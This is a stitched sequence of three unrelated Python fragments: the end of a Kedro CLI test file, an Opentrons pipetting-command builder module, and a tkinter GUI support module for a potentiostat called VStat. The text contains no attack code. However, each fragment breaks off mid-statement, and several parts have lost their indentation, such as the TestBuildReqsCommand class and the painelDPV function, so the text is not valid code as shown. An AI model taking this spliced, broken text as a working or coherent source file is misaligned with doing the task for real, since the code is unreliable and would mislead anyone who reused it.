        python_call_mock.assert_has_calls(
            [
                mocker.call("pip", ["install", "src/[docs]"]),
                mocker.call("pip", ["install", "-r", "src/requirements.txt"]),
                mocker.call("ipykernel", ["install", "--user", "--name=fake_package"]),
            ]
        )
        # Stale build output is removed first.
        fake_rmtree.assert_called_once_with("docs/build", ignore_errors=True)
    @pytest.mark.parametrize("open_flag", ["-o", "--open"])
    def test_open_docs(self, open_flag, fake_kedro_cli, mocker):
        # The --open flag launches the built docs in a web browser.
        patched_browser = mocker.patch("webbrowser.open")
        result = CliRunner().invoke(fake_kedro_cli.cli, ["build-docs", open_flag])
        assert not result.exit_code, result.stdout
        expected_path = (Path.cwd() / "docs" / "build" / "html" / "index.html").as_uri()
        patched_browser.assert_called_once_with(expected_path)
class TestBuildReqsCommand:
def test_requirements_file_exists(self, python_call_mock, fake_kedro_cli, mocker):
# File exists:
mocker.patch.object(Path, "is_file", return_value=True)
result = CliRunner().invoke(fake_kedro_cli.cli, ["build-reqs"])
assert not result.exit_code, result.stdout
assert "Requirements built!" in result.stdout
python_call_mock.assert_called_once_with(
"piptools", ["compile", str(Path.cwd() / | |
<reponame>Axel-Jacobsen/opentrons<gh_stars>1-10
from datetime import timedelta
from . import types as command_types
from opentrons.broker import Broker
import functools
import inspect
from typing import Union, Sequence, List, Any, Optional, TYPE_CHECKING
from opentrons.legacy_api.containers import (Well as OldWell,
Container as OldContainer,
Slot as OldSlot,
location_to_list)
from opentrons.protocol_api.labware import Well
from opentrons.protocols.api_support.util import FlowRates
from opentrons.types import Location
from opentrons.drivers import utils
if TYPE_CHECKING:
from opentrons.protocol_api.instrument_context import InstrumentContext
Apiv2Locations = Sequence[Union[Location, Well]]
Apiv2Instruments = Sequence['InstrumentContext']
def is_new_loc(location: Union[Location, Well, None,
                               OldWell, OldContainer,
                               OldSlot, Sequence]) -> bool:
    """Return True when *location* is an APIv2 location (Location/Well)."""
    first = listify(location)[0]
    return isinstance(first, (Location, Well))
def listify(location: Any) -> List:
    """Wrap *location* in a list; for nested lists, drill into the first
    element so the result is always a flat single-item list (an empty list
    is wrapped as-is)."""
    if not isinstance(location, list):
        return [location]
    try:
        return listify(location[0])
    except IndexError:
        # Empty list: nothing to drill into, wrap the empty list itself.
        return [location]
class CommandPublisher:
    """Mixin that holds the broker used to publish command notifications."""

    def __init__(self, broker):
        # Fall back to a fresh Broker when no (or a falsy) broker is given.
        self._broker = broker or Broker()

    @property
    def broker(self):
        """The broker this object publishes commands to."""
        return self._broker

    @broker.setter
    def broker(self, broker):
        self._broker = broker
def _stringify_new_loc(loc: Union[Location, Well]) -> str:
    """Render an APIv2 location as human-readable text."""
    if isinstance(loc, Location):
        # Bare point when there is no labware, otherwise name the labware.
        return str(loc.point) if loc.labware.is_empty else repr(loc.labware)
    if isinstance(loc, Well):
        return str(loc)
    raise TypeError(loc)
def _stringify_legacy_loc(loc: Union[OldWell, OldContainer,
                                     OldSlot, None]) -> str:
    """Render a legacy (APIv1) placeable as human-readable text,
    e.g. ``wells A1...B2 in "3"``."""
    def get_slot(location):
        # Walk the placeable's ancestry for the deck slot it sits in.
        trace = location.get_trace()
        for item in trace:
            if isinstance(item, OldSlot):
                return item.get_name()
            elif isinstance(item, str):
                return item
        return '?'
    type_to_text = {
        OldSlot: 'slot',
        OldContainer: 'container',
        OldWell: 'well',
    }
    # Coordinates only
    if loc is None:
        return '?'
    location = location_to_list(loc)
    multiple = len(location) > 1
    # Pluralize and show a first...last range when several placeables given.
    return '{object_text}{suffix} {first}{last} in "{slot_text}"'.format(
        object_text=type_to_text[type(location[0])],
        suffix='s' if multiple else '',
        first=location[0].get_name(),
        last='...'+location[-1].get_name() if multiple else '',
        slot_text=get_slot(location[0])
    )
def combine_locations(location: Sequence) -> str:
    """Join the first one or two locations into display text (extra entries
    beyond the first two are ignored, matching paired-pipette usage)."""
    if not location:
        return ''
    if len(location) == 1:
        return f'{stringify_location(location[0])}'
    first = stringify_location(location[0])
    second = stringify_location(location[1])
    return f'{first} and {second}'
def stringify_location(location: Union[Location, None,
                                       OldWell, OldContainer,
                                       OldSlot, Sequence]) -> str:
    """Render any supported location (APIv2 or legacy) as text."""
    if not is_new_loc(location):
        return _stringify_legacy_loc(location)  # type: ignore
    return ', '.join(
        _stringify_new_loc(loc) for loc in listify(location))
def make_command(name, payload):
    """Build the standard command dict published to the broker."""
    return dict(name=name, payload=payload)


def home(mount):
    """HOME command: homing the pipette plunger on *mount*."""
    return make_command(
        name=command_types.HOME,
        payload={
            'axis': mount,
            'text': f'Homing pipette plunger on mount {mount}',
        }
    )
def aspirate(instrument, volume, location, rate):
    """Build the ASPIRATE command for a single pipette.

    Handles both APIv2 instruments (which work with ``FlowRates``) and
    legacy instruments (which expose ``speeds``/``_ul_per_mm`` instead).
    """
    location_text = stringify_location(location)
    template = 'Aspirating {volume} uL from {location} at {flow} uL/sec'
    try:
        # APIv2 path: FlowRates yields the aspirate flow rate directly.
        flow_rate = rate * FlowRates(instrument).aspirate
        text = template.format(
            volume=float(volume), location=location_text, flow=flow_rate)
    except AttributeError:
        # Legacy path: convert plunger mm/sec into uL/sec at max volume.
        flow_mms = instrument.speeds['aspirate']
        flow_ulsec = flow_mms * instrument._ul_per_mm(instrument.max_volume,
                                                      'aspirate')
        flow_rate = rate * flow_ulsec
        flow_rate = round(flow_rate, 1)
        text = template.format(
            volume=float(volume), location=location_text, flow=flow_rate)
    return make_command(
        name=command_types.ASPIRATE,
        payload={
            'instrument': instrument,
            'volume': volume,
            'location': location,
            'rate': rate,
            'text': text
        }
    )
def paired_aspirate(
        instruments: Apiv2Instruments, volume: float,
        locations: Apiv2Locations, rate: float,
        pub_type: str):
    """ASPIRATE command for a paired-pipette aspirate; the reported flow
    rate is the slower of the two instruments'."""
    slowest = min(rate * FlowRates(instr).aspirate for instr in instruments)
    where = combine_locations(locations)
    message = (
        f'{pub_type}: Aspirating '
        f'{volume} uL from {where} at {slowest} uL/sec'
    )
    return make_command(
        name=command_types.ASPIRATE,
        payload={
            'instruments': instruments,
            'volume': volume,
            'locations': locations,
            'rate': rate,
            'text': message
        }
    )
def dispense(instrument, volume, location, rate):
    """Build the DISPENSE command for a single pipette.

    Handles both APIv2 instruments (which work with ``FlowRates``) and
    legacy instruments (which expose ``speeds``/``_ul_per_mm`` instead).
    """
    location_text = stringify_location(location)
    template = 'Dispensing {volume} uL into {location} at {flow} uL/sec'
    try:
        # APIv2 path: FlowRates yields the dispense flow rate directly.
        flow_rate = rate * FlowRates(instrument).dispense
        text = template.format(
            volume=float(volume), location=location_text, flow=flow_rate)
    except AttributeError:
        # Legacy path: convert plunger mm/sec into uL/sec at max volume.
        flow_mms = instrument.speeds['dispense']
        flow_ulsec = flow_mms * instrument._ul_per_mm(instrument.max_volume,
                                                      'dispense')
        flow_rate = rate * flow_ulsec
        flow_rate = round(flow_rate, 1)
        text = template.format(
            volume=float(volume), location=location_text, flow=flow_rate)
    return make_command(
        name=command_types.DISPENSE,
        payload={
            'instrument': instrument,
            'volume': volume,
            'location': location,
            'rate': rate,
            'text': text
        }
    )
def paired_dispense(
        instruments: Apiv2Instruments, volume: float,
        locations: Apiv2Locations, rate: float,
        pub_type: str):
    """DISPENSE command for a paired-pipette dispense; the reported flow
    rate is the slower of the two instruments'.

    Bug fix: this previously published ``command_types.ASPIRATE``, so
    paired dispenses were reported to subscribers as aspirates (the
    single-pipette ``dispense`` builder correctly uses DISPENSE).
    """
    loc_text = combine_locations(locations)
    flow_rate = min(
        rate * FlowRates(instr).dispense for instr in instruments)
    text_type = f'{pub_type}: Dispensing '
    text_content = f'{volume} uL into {loc_text} at {flow_rate} uL/sec'
    text = text_type + text_content
    return make_command(
        name=command_types.DISPENSE,
        payload={
            'instruments': instruments,
            'volume': volume,
            'locations': locations,
            'rate': rate,
            'text': text
        }
    )
def _build_group_liquid_command(name, verb, instrument, volume, source, dest):
    """Shared builder for the consolidate/distribute/transfer commands."""
    text = '{verb} {volume} from {source} to {dest}'.format(
        verb=verb,
        volume=transform_volumes(volume),
        source=stringify_location(source),
        dest=stringify_location(dest)
    )
    if is_new_loc(source):
        # Dest is assumed to be the same API generation as source.
        locations = listify(source) + listify(dest)
    else:
        # In case either source or dest is a list of tuple-locations,
        # strip both down to plain lists of Placeables.
        locations = location_to_list(source) + location_to_list(dest)
    return make_command(
        name=name,
        payload={
            'instrument': instrument,
            'locations': locations,
            'volume': volume,
            'source': source,
            'dest': dest,
            'text': text
        }
    )


def consolidate(instrument, volume, source, dest):
    """CONSOLIDATE command: many sources into one destination."""
    return _build_group_liquid_command(
        command_types.CONSOLIDATE, 'Consolidating',
        instrument, volume, source, dest)


def distribute(instrument, volume, source, dest):
    """DISTRIBUTE command: one source into many destinations."""
    return _build_group_liquid_command(
        command_types.DISTRIBUTE, 'Distributing',
        instrument, volume, source, dest)


def transfer(instrument, volume, source, dest):
    """TRANSFER command: move liquid from source(s) to dest(s)."""
    return _build_group_liquid_command(
        command_types.TRANSFER, 'Transferring',
        instrument, volume, source, dest)
def comment(msg):
    """COMMENT command carrying a free-text message."""
    return make_command(
        name=command_types.COMMENT,
        payload={'text': msg}
    )


def transform_volumes(volumes):
    """Coerce a single volume to float, or a list of volumes to floats."""
    if isinstance(volumes, list):
        return [float(vol) for vol in volumes]
    return float(volumes)
def mix(instrument, repetitions, volume, location):
    """MIX command for a single pipette."""
    message = (
        f'Mixing {repetitions} times with a volume of {float(volume)} ul'
    )
    return make_command(
        name=command_types.MIX,
        payload={
            'instrument': instrument,
            'location': location,
            'volume': volume,
            'repetitions': repetitions,
            'text': message
        }
    )
def paired_mix(
        instruments: Apiv2Instruments, locations: Apiv2Locations,
        repetitions: int, volume: float, pub_type: str):
    """MIX command for a paired-pipette mix.

    Bug fix: the message was assembled from an unformatted template, so the
    published text contained the literal placeholders '{repetitions}' and
    '{volume}' — every sibling builder formats its text eagerly.
    """
    text_type = f'{pub_type}: Mixing '
    text_content = f'{repetitions} times with a volume of {volume} ul'
    text = text_type + text_content
    return make_command(
        name=command_types.MIX,
        payload={
            'instruments': instruments,
            'locations': locations,
            'volume': volume,
            'repetitions': repetitions,
            'text': text
        }
    )
def blow_out(instrument, location):
    """BLOW_OUT command; mentions the location when one is given."""
    message = 'Blowing out'
    if location is not None:
        message += f' at {stringify_location(location)}'
    return make_command(
        name=command_types.BLOW_OUT,
        payload={
            'instrument': instrument,
            'location': location,
            'text': message
        }
    )


def paired_blow_out(
        instruments: Apiv2Instruments,
        locations: Optional[Apiv2Locations],
        pub_type: str):
    """BLOW_OUT command for a paired-pipette blow out."""
    message = f'{pub_type}: Blowing out'
    if locations is not None:
        message += f' at {combine_locations(locations)}'
    return make_command(
        name=command_types.BLOW_OUT,
        payload={
            'instruments': instruments,
            'locations': locations,
            'text': message
        }
    )
def touch_tip(instrument):
    """TOUCH_TIP command for a single pipette."""
    return make_command(
        name=command_types.TOUCH_TIP,
        payload={'instrument': instrument, 'text': 'Touching tip'}
    )


def paired_touch_tip(
        instruments: Apiv2Instruments,
        locations: Optional[Apiv2Locations],
        pub_type: str):
    """TOUCH_TIP command for a paired-pipette touch tip."""
    message = f'{pub_type}: Touching tip'
    if locations is not None:
        message += f' at {combine_locations(locations)}'
    return make_command(
        name=command_types.TOUCH_TIP,
        payload={
            'instruments': instruments,
            'locations': locations,
            'text': message
        }
    )
def air_gap():
    """AIR_GAP command (no payload beyond the message)."""
    return make_command(
        name=command_types.AIR_GAP,
        payload={'text': 'Air gap'}
    )


def return_tip():
    """RETURN_TIP command (no payload beyond the message)."""
    return make_command(
        name=command_types.RETURN_TIP,
        payload={'text': 'Returning tip'}
    )
def pick_up_tip(instrument, location):
    """PICK_UP_TIP command for a single pipette."""
    return make_command(
        name=command_types.PICK_UP_TIP,
        payload={
            'instrument': instrument,
            'location': location,
            'text': f'Picking up tip from {stringify_location(location)}'
        }
    )


def paired_pick_up_tip(
        instruments: Apiv2Instruments,
        locations: Apiv2Locations, pub_type: str):
    """PICK_UP_TIP command for a paired-pipette tip pickup."""
    where = combine_locations(locations)
    return make_command(
        name=command_types.PICK_UP_TIP,
        payload={
            'instruments': instruments,
            'locations': locations,
            'text': f'{pub_type}: Picking up tip from {where}'
        }
    )
def drop_tip(instrument, location):
    """DROP_TIP command for a single pipette."""
    return make_command(
        name=command_types.DROP_TIP,
        payload={
            'instrument': instrument,
            'location': location,
            'text': f'Dropping tip into {stringify_location(location)}'
        }
    )


def paired_drop_tip(
        instruments: Apiv2Instruments,
        locations: Apiv2Locations, pub_type: str):
    """DROP_TIP command for a paired-pipette tip drop."""
    where = combine_locations(locations)
    return make_command(
        name=command_types.DROP_TIP,
        payload={
            'instruments': instruments,
            'locations': locations,
            'text': f'{pub_type}: Dropping tip into {where}'
        }
    )
def magdeck_engage():
    """MAGDECK_ENGAGE command."""
    return make_command(
        name=command_types.MAGDECK_ENGAGE,
        payload={'text': "Engaging Magnetic Module"}
    )


def magdeck_disengage():
    """MAGDECK_DISENGAGE command."""
    return make_command(
        name=command_types.MAGDECK_DISENGAGE,
        payload={'text': "Disengaging Magnetic Module"}
    )


def magdeck_calibrate():
    """MAGDECK_CALIBRATE command."""
    return make_command(
        name=command_types.MAGDECK_CALIBRATE,
        payload={'text': "Calibrating Magnetic Module"}
    )
def tempdeck_set_temp(celsius):
    """TEMPDECK_SET_TEMP command; the displayed target is rounded."""
    shown = round(float(celsius), utils.TEMPDECK_GCODE_ROUNDING_PRECISION)
    return make_command(
        name=command_types.TEMPDECK_SET_TEMP,
        payload={
            'celsius': celsius,
            'text': "Setting Temperature Module temperature "
                    f"to {shown} °C (rounded off to nearest integer)"
        }
    )


def tempdeck_await_temp(celsius):
    """TEMPDECK_AWAIT_TEMP command; the displayed target is rounded."""
    shown = round(float(celsius), utils.TEMPDECK_GCODE_ROUNDING_PRECISION)
    return make_command(
        name=command_types.TEMPDECK_AWAIT_TEMP,
        payload={
            'celsius': celsius,
            'text': "Waiting for Temperature Module to reach temperature "
                    f"{shown} °C (rounded off to nearest integer)"
        }
    )


def tempdeck_deactivate():
    """TEMPDECK_DEACTIVATE command."""
    return make_command(
        name=command_types.TEMPDECK_DEACTIVATE,
        payload={'text': "Deactivating Temperature Module"}
    )
def thermocycler_open():
    """THERMOCYCLER_OPEN command."""
    return make_command(
        name=command_types.THERMOCYCLER_OPEN,
        payload={'text': "Opening Thermocycler lid"}
    )
def thermocycler_set_block_temp(temperature,
hold_time_seconds,
hold_time_minutes):
temp = round(float(temperature), utils.TC_GCODE_ROUNDING_PRECISION)
text = f'Setting Thermocycler well block temperature to {temp} | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.20
# in conjunction with Tcl version 8.6
# Feb 18, 2019 11:55:48 AM -03 platform: Windows NT
# Feb 19, 2019 09:09:42 AM -03 platform: Windows NT
"""
Created on Mon Feb 18 10:08:04 2019
@author: <NAME>
"""
import sys
import Controller as ctrl
import Model as md
import Estilos as es
import numpy as np
#from numpy import array, concatenate, ndarray, append, take, delete
import pandas as pd
from tkinter import filedialog, colorchooser, IntVar
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def set_var():
    """Initialise (or reset) the module-level state shared by the GUI.

    NOTE(review): relies on ``w`` and ``root`` having been set by ``init``
    first, since the validator is constructed against them.
    """
    global conn, qtdMin, curvePlot, curvesList, cBoxList, md_dpv, validation
    conn = 0          # serial-connection flag (0 = disconnected)
    qtdMin = 0        # number of thumbnails currently shown
    curvePlot = np.ndarray([])
    curvesList = np.ndarray([])
    cBoxList = np.ndarray([])
    md_dpv = md.dpv()
    validation = ctrl.validation(w, root)
def init(top, gui, *args, **kwargs):
    """PAGE entry point: store the window handles, reset module state and
    build the DPV parameter panel."""
    global w, top_level, root, font9
    w = gui
    top_level = top
    root = top
    #font9 = "-family {Segoe UI} -size 9 -weight bold -slant roman " \
    #    "-underline 0 -overstrike 0"
    set_var()
    painelDPV()
def destroy_window():
    """Close the top-level window and drop the module's reference to it."""
    # Function which closes the window.
    global top_level
    top_level.destroy()
    top_level = None
# Allow running this support module directly for quick manual testing:
# delegates to the main VStat GUI bootstrap.
if __name__ == '__main__':
    import VStat
    VStat.vp_start_gui()
########## Funções ###########
def createCanvas():
    """(Re)create the main plot canvas and the toolbar frame above it."""
    w.cv_curveGraph = tk.Canvas(w.fr_mainView)
    w.cv_curveGraph.place(relx=0.012, rely=0.119, relheight=0.857,
                          relwidth=0.974)
    w.cv_curveGraph.configure(
        background="#ffffff",
        highlightbackground="#ffffff",
        highlightcolor="black",
        insertbackground="black",
        relief='ridge',
        selectbackground="#c4c4c4",
        selectforeground="black",
        width=823,
    )
    w.fr_toolbar = tk.Frame(w.fr_mainView)
    w.fr_toolbar.place(relx=0.012, rely=0.02, height=38, relwidth=0.974)
    w.fr_toolbar.configure(
        relief='groove',
        borderwidth="2",
        background="#f9f9f9",
        highlightbackground="#f9f9f9",
        highlightcolor="black",
        width=823,
    )
def btn_import(p1):
    """Toolbar handler: load a curve from a user-chosen CSV file, plot it
    and add it to the thumbnail list."""
    global curvesList, curvePlot, spAt, cnvAt
    curvePlot = np.ndarray([])
    curvesList = np.ndarray([])
    path = filedialog.askopenfilename(
        initialdir="C:/", title="Importar CSV...",
        filetypes=(("Comma-separeted values", "*.csv"),
                   ("All files", "*.*")))
    if not path:
        return
    csv = ctrl.file.importCsv(path)
    top_level.title("VStat - " + csv.curveName + ".csv")
    curvePlot = np.append(curvePlot, csv, axis=None)
    spAt, cnvAt = drawCurve()
    cnvAt.draw()
    curvesList = np.append(curvesList, csv, axis=None)
    createMins()
def btn_export(p1):
    """Toolbar handler: export the single currently-plotted curve to CSV.

    Merged plots and empty plots are rejected with a status message.
    """
    global curvePlot
    if curvePlot.size < 2:
        w.lb_ConnInfo.configure(text="Sem curva para\nexportar")
    elif curvePlot.size > 2:
        w.lb_ConnInfo.configure(text="Ainda não é possível\nexportar curvas unidas")
    else:
        csvName = filedialog.asksaveasfilename(
            title='Exportar CSV...', defaultextension='csv',
            initialdir="C:/",
            filetypes=(("Comma-separeted values", "*.csv"),
                       ("All files", "*.*")))
        ctrl.file.exportCsv(np.take(curvePlot, 1), csvName)
def btn_connect(p1):
    """Toolbar handler: toggle the serial connection to the VStat."""
    global conn
    if conn:
        ctrl.connection.disconnect()
        conn = 0
        w.btn_connect.configure(text='''Conectar''', background="#738c8c")
        w.btn_connect.update()
        w.lb_ConnInfo.configure(text="VStat desconectado")
        return
    vstat = ctrl.connection.connect()
    if not vstat:
        w.lb_ConnInfo.configure(text="VStat não encontrado")
        return
    conn = 1
    w.lb_ConnInfo.configure(text="VStat conectado\nPorta "+vstat)
    w.btn_connect.configure(text='''Desconectar''', background="#00cccc")
    w.btn_connect.update()
def btn_iniciar(p1):
    """Start button handler: read the DPV parameters from the form, send
    them to the potentiostat and stream the measured curve into the plot."""
    global curvePlot, curvesList, spAt, cnvAt, md_dpv
    # Persist the form values in the DPV model.
    md_dpv.pIni = w.et_PInicio.get()
    md_dpv.pFim = w.et_PFim.get()
    md_dpv.pPul = w.et_PPulso.get()
    md_dpv.pPas = w.et_PPasso.get()
    md_dpv.tPul = w.et_TPulso.get()
    md_dpv.tPas = w.et_tPasso.get()
    md_dpv.tEqu = w.et_tEquil.get()
    md_dpv.fEsc = w.cb_intCorrente.current()
    # Clear the thumbnail frame.
    destroyChildren(w.fr_miniaturas)
    w.fr_miniaturas.update()
    # Check whether the potentiostat is connected and start the analysis
    # (openPort() returning truthy signals failure here, per the branch).
    ini = ctrl.connection.openPort()
    if ini:
        w.lb_ConnInfo.configure(text="VStat não conectado")
        w.btn_connect.configure(background="#ff6666")
        w.btn_connect.update()
    else:
        """x = np.arange(float(w.et_PInicio.get()), float(w.et_PFim.get()), float(w.et_PPasso.get()))
        y = np.arange(0, x.size, 1)
        c = md.curve("live Plot", x, y)
        curvePlot = np.append(curvePlot, c)"""
        # Send the sweep parameters to the device.
        ctrl.transmition.transmit(str(w.cb_intCorrente.current()),
                                  w.et_PInicio.get(),
                                  w.et_PFim.get(),
                                  w.et_PPulso.get(),
                                  w.et_PPasso.get(),
                                  w.et_TPulso.get(),
                                  w.et_tPasso.get(),
                                  w.et_tEquil.get())
        destroyChildren(w.fr_mainView)
        # Current full-scale factor (ADC counts -> current).
        if w.cb_intCorrente.current() == 0:
            fe = 5/(4096/3.3)
            print("Escala: Automática")
            print("fundo de escala(inicial): ", fe)
        else:
            fe = int(w.cb_intCorrente.get()[4:-2])/(4096/3.3)
            print("Escala: ", w.cb_intCorrente.get()[4:-2])
            print("fundo de escala: ", fe)
        # Fresh, empty curve to be filled by the live receive loop.
        curvePlot = np.ndarray([])
        curvePlot = np.append(curvePlot, md.curve("", np.array([]), np.array([])))
        spAt, cnvAt = drawCurve()
        curvesList = ctrl.transmition.receive(curvePlot, spAt, cnvAt, fe, float(w.et_PInicio.get()), float(w.et_PPasso.get()))#, canvas)
        #curvePlot = np.append(curvePlot, np.take(curvesList, 1))
        ctrl.connection.closePort()
        #if dpv:
        top_level.title("VStat - " + np.take(curvePlot, 1).curveName)#dpv.curveName)
        #createCanvas()
        #spAt, cnvAt = drawCurve()
        createMins()
def drawCurve():
    """Plot ``curvePlot`` on a freshly created canvas.

    Returns the (subplot, canvas) pair so callers can keep drawing into it.
    Fix: the canvas widget was packed twice (two identical ``pack`` calls);
    it is now packed exactly once, and dead commented-out code is removed.
    """
    global curvePlot, sp, fig
    createCanvas()
    fig = Figure(figsize=(10, 8), dpi=100)
    sp = fig.add_subplot(111, xlabel="Potencial em Volts (V)",
                         ylabel="Corrente em Microampere (µA)")
    canvas = FigureCanvasTkAgg(fig, master=w.cv_curveGraph)
    toolbar = NavigationToolbar2Tk(canvas, w.fr_toolbar)
    if curvePlot.size == 2:
        # Single curve: title it with the curve's own name.
        cv = np.take(curvePlot, 1)
        sp.set_title(cv.curveName)
        sp.plot(cv.curveX, cv.curveY, color=cv.color)
    elif curvePlot.size > 2:
        # Merged view: draw every curve after the placeholder at index 0.
        sp.set_title("untitle merge")
        for i in range(1, curvePlot.size):
            cv = np.take(curvePlot, i)
            sp.plot(cv.curveX, cv.curveY, color=cv.color)
    toolbar.update()
    canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
    return sp, canvas
def expandMin(curveIndex):
    """Show the thumbnail at *curveIndex* as the single main-view curve."""
    global curvesList, curvePlot, spAt, cnvAt
    # +1 skips the placeholder element at index 0 of curvesList.
    selected = np.take(curvesList, curveIndex + 1)
    curvePlot = np.append(np.ndarray([]), selected, axis=None)
    spAt, cnvAt = drawCurve()
def createMins():
    """Rebuild the thumbnail strip: one miniature per curve in curvesList."""
    global cBoxList, curvesList, qtdMin
    # Drop any existing miniatures before recreating them.
    qtdMin = 0
    destroyChildren(w.fr_miniaturas)
    for idx in range(1, curvesList.size):
        createMin(np.take(curvesList, idx))
def createMin(curve):
    """Create one thumbnail for *curve*: title label, miniature plot,
    selection checkbox and a color swatch, positioned after the existing
    thumbnails."""
    global qtdMin, cBoxList
    cBoxList = np.append(cBoxList, IntVar(), axis=None)
    # Capture the index now: the lambdas below must keep pointing at this
    # thumbnail after qtdMin moves on.
    thisIndex = qtdMin
    relX = 0.01
    if qtdMin == 0:
        qtdMin += 1
    elif qtdMin > 0:
        # Shift each new thumbnail right of the previous ones.
        relX = (0.152 * qtdMin) + 0.01
        qtdMin += 1
    # Title label above the thumbnail.
    w.lb_minCurve = tk.Label(w.fr_miniaturas)
    w.lb_minCurve.place(relx=relX, rely=0.058, height=21, width=133)
    w.lb_minCurve.configure(background="#d9d9d9")
    w.lb_minCurve.configure(disabledforeground="#a3a3a3")
    w.lb_minCurve.configure(foreground="#000000")
    w.lb_minCurve.configure(text=curve.curveName)
    w.lb_minCurve.configure(width=133)
    w.lb_minCurve.bind("<Button-1>", lambda x:expandMin(thisIndex))
    # Canvas to draw the miniature plot on.
    w.cv_minCurve = tk.Canvas(w.fr_miniaturas)
    w.cv_minCurve.place(relx=relX, rely=0.165, height=112, width=133)
    fig = Figure(figsize=(1, 1), dpi = 100)
    canvas = FigureCanvasTkAgg(fig, master = w.cv_minCurve)
    #toolbar = NavigationToolbar2Tk(canvas, w.fr_toolbar)
    sp = fig.add_subplot(111)
    sp.plot(curve.curveX, curve.curveY)
    #toolbar.update()
    #canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
    canvas.draw()
    canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
    # Clicking the miniature also expands it into the main view.
    canvas.mpl_connect('button_press_event', lambda x: expandMin(thisIndex))
    w.cb_chooser = tk.Checkbutton(w.cv_minCurve)
    w.cb_chooser.place(relx=0.075, rely=0.097, relheight=0.243, relwidth=0.211)
    w.cb_chooser.configure(activebackground="#ececec")
    w.cb_chooser.configure(activeforeground="#000000")
    w.cb_chooser.configure(background="#d9d9d9")
    w.cb_chooser.configure(disabledforeground="#a3a3a3")
    w.cb_chooser.configure(foreground="#000000")
    w.cb_chooser.configure(highlightbackground="#d9d9d9")
    w.cb_chooser.configure(highlightcolor="black")
    w.cb_chooser.configure(justify='left')
    w.cb_chooser.configure(variable=np.take(cBoxList, thisIndex+1))
    # Color swatch; clicking it opens the color chooser for this curve.
    w.fr_color = tk.Frame(w.cv_minCurve)
    w.fr_color.place(relx=0.752, rely=0.097, relheight=0.243, relwidth=0.188)
    w.fr_color.configure(relief='groove')
    w.fr_color.configure(borderwidth="2")
    w.fr_color.configure(relief='groove')
    w.fr_color.configure(background="#1559c6")
    w.fr_color.configure(width=25)
    w.fr_color.bind("<Button-1>", lambda e:changeColor(e, thisIndex, sp, canvas))
def destroyChildren(frame):
    """Recursively destroy every descendant widget of *frame*."""
    for kid in frame.winfo_children():
        # Depth-first: clear grandchildren before destroying the child
        # (recursing on a childless widget simply iterates an empty list).
        destroyChildren(kid)
        kid.destroy()
def changeColor(p1, curveIndex, sp, canvas):
    """Swatch click handler: let the user pick a new color for the curve
    at *curveIndex*, recolor its plots and the swatch itself.

    NOTE(review): the hex value is recovered by slicing the *string form*
    of ``colorchooser.askcolor()``'s return value (``c[-9:-2]``) — fragile;
    verify against the ((r, g, b), '#rrggbb') tuple it actually returns.
    """
    global curvesList, curvePlot
    color = colorchooser.askcolor()
    c = str(color)
    c = c[-9:-2]  # extract "#rrggbb" from the stringified tuple
    cv = np.take(curvesList, curveIndex+1)
    cv.color = c
    sp.plot(cv.curveX, cv.curveY, c)
    canvas.draw()
    p1.widget.configure(background=cv.color)
    p1.widget.update()
    drawCurve()
def curvesJoin():
    """Merge the checked thumbnails into a single multi-curve plot.

    Requires at least two checked curves; all checkboxes are cleared.
    """
    global curvePlot
    picked = 0
    for i in range(1, cBoxList.size):
        box = np.take(cBoxList, i)
        if box.get():
            if picked == 0:
                # First selection: start a fresh plot list.
                curvePlot = np.ndarray([])
            curvePlot = np.append(curvePlot, np.take(curvesList, i),
                                  axis=None)
            picked += 1
        box.set(0)
    if picked <= 1:
        w.lb_ConnInfo.configure(text="Selecione ao menos\nduas curvas")
    else:
        drawCurve()
def removeCurve():
    """Delete every checked curve from the curve/checkbox lists and
    rebuild the thumbnails.

    NOTE(review): ``curvePlot`` is not updated when a plotted curve is
    removed, and the ``t is p`` branch below is a leftover no-op from
    debugging.
    """
    global curvesList, cBoxList, curvePlot
    #print("remover")
    i = 1
    # Deleting shrinks the arrays, so only advance i when nothing was
    # removed at this position.
    while i < cBoxList.size:
        c = np.take(cBoxList, i)
        t = np.take(curvesList, i)
        p = np.take(curvePlot, 1)
        if t is p:
            #print("Igual")
            pass
        #print("c: "+ str(c.get()))
        if c.get():
            #if t is p:
            curvesList = np.delete(curvesList, i)
            cBoxList = np.delete(cBoxList, i)
        else:
            i += 1
    createMins()
#-----------------------------------------------------#
# PAINEIS #
#-----------------------------------------------------#
#---- Painel DPV ----#
def painelDPV():
global md_dpv
destroyChildren(w.fr_analise)
w.fr_analise.configure(text='''DPV''')
vcmd = w.fr_analise.register(validation.entryValidate)
# Inicializa entradas que serão manipuladas
w.et_PInicio = tk.Entry(w.fr_analise)
w.et_PFim = tk.Entry(w.fr_analise)
w.et_PPasso = tk.Entry(w.fr_analise)
w.et_tPasso = tk.Entry(w.fr_analise)
w.lb_PInicio = tk.Label(w.fr_analise, anchor="w")
w.lb_PInicio.place(relx=0.053, y=17, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PInicio)
w.lb_PInicio.configure(text='''Pot. Inicial (V)''')
w.et_PInicio.configure(validate="key")
w.et_PInicio.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PInicio.place(relx=0.59, y=18, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PInicio)
ctrl.validation.entryInsert(w.et_PInicio, md_dpv.pIni)
w.lb_PFim = tk.Label(w.fr_analise, anchor="w")
w.lb_PFim.place(relx=0.053, y=43, height=21, width=91
, bordermode='ignore')
es.lbStyle(w.lb_PFim)
w.lb_PFim.configure(text='''Pot. Final (V)''')
w.lb_PFim.configure(width=71)
w.et_PFim.configure(validate="key")
w.et_PFim.configure(validatecommand=(vcmd, '%d', '%i', '%P', '%S', '%W'))
w.et_PFim.place(relx=0.59, y=44, height=20, width=77
, bordermode='ignore')
es.etStyle(w.et_PFim)
ctrl.validation.entryInsert(w.et_PFim, md_dpv.pFim)
w.lb_PPasso = tk.Label(w.fr_analise, anchor="w")
w.lb_PPasso.place(relx=0.053, y=69, height=21, width=91
, bordermode='ignore')
